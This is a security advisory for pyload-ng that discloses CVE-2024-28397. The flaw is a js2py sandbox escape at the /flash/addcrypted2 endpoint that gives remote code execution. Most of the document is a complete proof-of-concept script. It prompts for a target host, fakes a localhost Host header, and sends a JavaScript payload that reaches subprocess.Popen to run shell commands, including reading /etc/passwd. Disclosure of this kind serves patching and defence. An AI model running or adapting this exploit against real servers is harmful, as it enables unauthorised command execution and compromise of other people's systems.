Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately.
js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the /flash/addcrypted2
API endpoint of pyload-ng. Although this endpoint is designed to only accept localhost connection, we can bypass this restriction using HTTP Header, thus accessing this API and achieve RCE.
The PoC is provided as poc.py
below, you can modify the shell command it execute:
import socket
import base64
from urllib.parse import quote
host, port = input("host: "), int(input("port: "))
payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator;"
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__
function findpopen(o) {
let result;
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i]
if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
return item
}
if(item.__name__ != "type" && (result = findpopen(item))) {
return result
}
}
}
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
function f() {
return n11
}
"""
crypted_b64 = base64.b64encode(b"1234").decode()
data = f"package=pkg&crypted={quote(crypted_b64)}&jk={quote(payload)}"
request = f"""\
POST /flash/addcrypted2 HTTP/1.1
Host: 127.0.0.1:9666
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(data)}
{data}
""".encode().replace(b"\n", b"\r\n")
def main():
s = socket.socket()
s.connect((host, port))
s.send(request)
response = s.recv(1024).decode()
print(response)
if __name__ == "__main__":
main()
Anyone who runs the latest version (<=0.5.0b3.dev85) of pyload-ng under python3.11 or below. pyload-ng doesn't use js2py for python3.12 or above.
{ "nvd_published_at": null, "cwe_ids": [ "CWE-94" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2024-09-09T18:17:20Z" }